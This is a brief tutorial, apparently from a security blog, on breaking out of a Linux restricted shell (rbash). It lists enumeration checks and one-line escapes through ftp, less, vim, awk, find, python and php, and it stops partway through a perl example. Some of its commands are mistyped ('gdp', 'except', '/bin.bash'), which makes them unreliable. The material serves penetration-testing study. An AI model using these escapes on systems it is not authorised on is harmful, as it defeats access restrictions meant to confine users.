Advanced Techniques to Bypass Restricted shell | Privilege Escalation Tutorial

This article will help you to bypass restricted shell. Privilege escalation techniques helps to bypass rbash .

Read previous article first . I have covered basics techniques there.

Enumeration :

Firstly , we need to enumerate Linux environmental to check what we can bypass the rbash.

What information we need to enumerate:

must check for available commands like cd , ls , echo etc.must check for operators like >,<,>>,\.check for available programming such as perl, python, ruby, etc.which commands we can run here (sudo -l).check SUID permission.must check which shell you are using right now : echo $SHELL mostly it is rbash.check for the environmental variable: run env or printenv.

Common Exploitation Techniques:

if “/” is allowed you can run /bin/sh or /bin/bash.if you can run cp commands then copy /bin/sh or /bin/bash into your directory.from ftp > !/bin/sh or !/bin/bashfrom gdp>!/bin/sh or !/bin/bashfrom more/man/less > !/bin/sh or !/bin/bashfrom vim > !/bin/sh or !/bin/bashfrom rvim> python import os; os.system(“/bin/bash”)from scp > scp -S /path/yourscript x y:from awk > awk ‘BEGIN {SYSTEM (“/bin/sh or /bin.bash”)}’from find > / -name test -exec /bin/sh or /bin/bash \ ;

Programming Language Techniques:

from except> except spawn sh then shfrom python > python -c “import os;os.system(‘/bin/bash’)”from php > php -a then exec(“sh -i”);perl > perl -e ‘exec…